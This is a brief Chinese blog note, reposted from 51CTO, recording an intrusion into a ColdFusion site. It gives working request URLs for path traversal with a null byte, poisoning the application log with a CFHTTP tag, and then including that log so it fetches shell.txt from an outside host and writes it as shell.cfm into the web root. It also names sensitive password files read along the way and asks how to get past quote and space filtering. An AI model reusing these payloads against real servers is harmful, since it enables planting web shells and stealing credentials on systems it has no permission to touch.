1.读取metabase.xml/web.xml /password.properities敏感文件,得知www路径,coldfusion路径,coldfusion后台加密密码

http://www.ypt.com/index.cfm?action=../../../../../../../../../../CFusionMX7/logs/application.log%00

http://www.ypt.com/index.cfm?action=<CFHTTP METHOD=Get URL=#URL.u# PATH=#URL.p# FILE=#URL.f#>

http://www.ypt.com/index.cfm?action=..\..\..\CFusionMX7\logs\application.log%00&u=http://www.pentest.cc/shell.txt&p=c:\inetpub\wwwroot\&f=shell.cfm

1.WEB目录可写

2.coldfusion目录和web目录在同一个分区

3.多个牛人的群策群力

未解决的问题：

1.iis的日志会把空格变成+，不知道怎么绕过

2.coldfusion会把单引号和双引号加倍处理，不知道怎么绕过去（师傅也遇到这个问题了，哈哈）

主要还是月月搞的,我只是做个记录,怕忘了.

本文转sinojelly51CTO博客，原文链接：http://blog.51cto.com/pnig0s1992/370813，如需转载请自行联系原作者